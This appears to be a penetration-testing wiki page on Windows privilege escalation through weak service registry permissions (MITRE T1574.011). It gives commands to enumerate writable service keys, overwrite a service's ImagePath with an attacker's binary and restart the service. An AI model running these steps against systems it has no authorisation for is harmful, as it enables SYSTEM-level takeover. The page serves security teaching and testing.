Weak Registry Permissions

MITRE ATT&CK™ Hijack Execution Flow - Services Registry Permissions Weakness - Technique T1574.011

Theory

By hijacking the Registry entries utilized by services, attackers can run their malicious payloads. Attackers may use weaknesses in registry permissions to divert from the initially stated executable to one they control upon Service start, allowing them to execute their unauthorized malware.

Practice

An attacker can leverage this misconfiguration to modify the ImagePath of service with the path of the custom malicious executable that will give an escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).

We can check our permissions over services registry using one of the following methods:

CMD

#Get the binary paths of the services
reg query hklm\System\CurrentControlSet\Services /s /v imagepath

#Try to write every service with its current content (to check if you have write permissions)
for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul & reg save %a %temp%\reg.hiv 2>nul && reg restore %a %temp%\reg.hiv 2>nul && echo You can modify %a

Powershell

#With PowerShell
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"

Get-Acl -Path HKLM:\SYSTEM\CurrentControlSet\Services\<ServiceName> | fl

AccessChk

Alternativly, we can use from sysinternals tools to enum permissions over services.

#List rights for authenticated users on registry
accesschk64.exe /accepteula "authenticated users" -kvuqsw hklm\System\CurrentControlSet\services

#List everyone rights on registry
accesschk64.exe /accepteula -kvuqsw hklm\System\CurrentControlSet\services

#List everyone rights on specific service registry
accesschk64.exe /accepteula -kvuqsw hklm\System\CurrentControlSet\services\<Name>

winPEAS

winPEASx64.exe servicesinfo

To change the path of th binary

reg add HKLM\SYSTEM\CurrentControlSet\services\<service_name> /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f

And then, restart the service

#Using wmic
wmic service <Service_Name> call stopservice
wmic service <Service_Name> call startservice

#Using net
net stop <Service_Name> && net start <Service_Name>

#Using sc.exe
sc stop <Service_Name>
sc start <Service_Name>

Resources

Last updated 28 days ago

Was this helpful?